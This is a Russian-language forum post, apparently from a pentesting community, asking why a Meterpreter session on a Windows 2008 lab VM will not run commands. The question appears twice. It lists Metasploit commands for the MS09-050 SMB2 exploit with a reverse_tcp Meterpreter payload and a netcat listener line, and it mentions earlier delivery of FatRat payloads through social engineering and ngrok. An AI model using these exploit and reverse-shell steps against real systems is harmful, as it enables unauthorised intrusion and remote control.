Доброго времени господа pentesterы!
Я прошу просвещения!
Раньше , для получения meterpretera я генерил payload c помощью FATRAT и с помощью СИ доставлял его на целевую машину, а с помощью ngrok ловил реверс. Сейчас же я его не заливаю на целевой ПК , а задаю следующие параметры на своей машине и ловлю реверс.
Вопрос ! Почему мне не удаётся получить полноценный meterpreter ? ПРОШУ О ПРОСВЯЩЕНИИ
Дело следующее :
1.Имеется испытуемая виртуалка win 2008 на ESXI с адресом 192.168.0.231 и атакцющая машина с адресом 192.168.0.238
2.Для получения meterpreter использую netcat
Задаю параметры :
use windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.0.231
set LHOST 192.168.0.238
set LPORT 4444
exploit
nc 192.168.0.238 4444
3.после получения meterpreter невозможно использовать такие команды как sysinfo , getuid и тд
Я прошу просвещения!
Раньше , для получения meterpretera я генерил payload c помощью FATRAT и с помощью СИ доставлял его на целевую машину, а с помощью ngrok ловил реверс. Сейчас же я его не заливаю на целевой ПК , а задаю следующие параметры на своей машине и ловлю реверс.
Вопрос ! Почему мне не удаётся получить полноценный meterpreter ? ПРОШУ О ПРОСВЯЩЕНИИ
Дело следующее :
1.Имеется испытуемая виртуалка win 2008 на ESXI с адресом 192.168.0.231 и атакцющая машина с адресом 192.168.0.238
2.Для получения meterpreter использую netcat
Задаю параметры :
use windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.0.231
set LHOST 192.168.0.238
set LPORT 4444
exploit
nc 192.168.0.238 4444
3.после получения meterpreter невозможно использовать такие команды как sysinfo , getuid и тд